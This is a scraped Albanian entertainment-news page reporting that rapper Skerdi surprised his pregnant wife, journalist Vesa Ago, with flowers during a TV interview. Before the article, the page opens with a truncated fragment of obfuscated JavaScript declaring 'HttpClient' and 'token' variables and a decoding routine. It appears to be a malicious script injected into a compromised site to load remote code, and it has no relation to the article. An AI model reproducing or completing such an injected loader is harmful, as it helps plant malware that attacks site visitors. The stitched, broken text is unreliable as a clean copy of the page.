;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Më romantik se çdo herë tjetër! Skerdi befason personin e zemrës në emision

By

Rreth dy javë më parë, reperi i njohur shqiptar Skerdi, njoftoi fansat se ai dhe bashkëshortja e tij, Vesa, shumë shpejt do të bëhen prindër për herë të parë.

E ftuar në studion e “Ftesë në 5” me Bieta Sulon, gazetarja kosovare, Vesa Ago, tregoi të vërtetën e marrëdhënies shumë të përfolur me Skerdin, emocionet e pritjes së ëmbël dhe planet për dasmën.

Ajo pranoi se sapo ka hyrë në muajin e gjashtë të shtatzënisë dhe deri tani çdo gjë ka shkuar shumë mirë, kjo falë edhe mbështetjes e kujdesit të partnerit të saj.

Edhe pse e vlerësoi reperin me fjalët më të mira si një baba të ardhshëm, Vesa tregoi se kur bëhet fjalë për organizim surprizash, Skerdi nuk është natyrë shumë romantike. E në fakt, vetëm pak minuta më vonë ai i vërtetoi plotësisht të kundërtën, teksa u fut surprizë në studio me një buqetë të madhe me lule.

Tejet i emocionuar, reperi nga Berati, puthi barkun e rrumbullakosur të së shoqes dhe më pas e puthi dhe përqafoi vetë atë. /Top Channel

Artikuj të ngjashëm